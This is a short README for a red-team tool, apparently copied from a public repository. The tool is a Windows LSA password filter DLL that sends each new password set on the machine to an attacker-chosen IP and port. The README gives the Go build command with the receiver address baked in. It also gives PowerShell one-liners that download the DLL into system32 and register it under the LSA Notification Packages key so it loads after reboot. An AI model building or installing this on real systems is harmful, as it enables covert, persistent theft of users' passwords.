win-pass-filter

stolen from https://github.com/iDigitalFlame/redteam-tools

This is a windows LSA password filter that sends the new password to an IP of your choosing.

Build

Simply build for windows with CGO enabled and the appropriate receiver listing port.

GOOS=windows CGO_ENABLED=1 go build -v -x -o filter.dll -buildmode=c-shared -ldflags '-X main.remote=192.168.0.100:4444'

You'll need MinGW or another proper c compiler that can build windows binaries. Try my brimstone/golang docker image.

Install

Copy the filter.dll to somewhere like c:\windows\system32\idk.dll and install with powershell

powershell -com "function install{Param([string]$u,[string]$a);$b=New-Object System.Net.WebClient;$b.DownloadFile($u, 'C:\Windows\system32\'+$a+'.dll');$l='HKLM:\System\CurrentControlSet\Control\Lsa';$n='Notification Packages';$c=(Get-ItemProperty $l -Name $n).$n; Set-ItemProperty $l -Name $n -Value ""$c`r`n$a""}"

or

powershell -com "$a='idk';$k='SYSTEM\CurrentControlSet\Control\LSA';$v='Notification Packages';$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine','localhost');$key=$reg.OpenSubKey($k,$true);$arr=$key.GetValue($v);$arr=@($arr);if($arr -notcontains $a){$arr+=$a};$key.SetValue($v,[string[]]$arr,'MultiString')"

If you change the name of the dll in c:\windows\system32 then also update the $a variable.

Reboot when finished.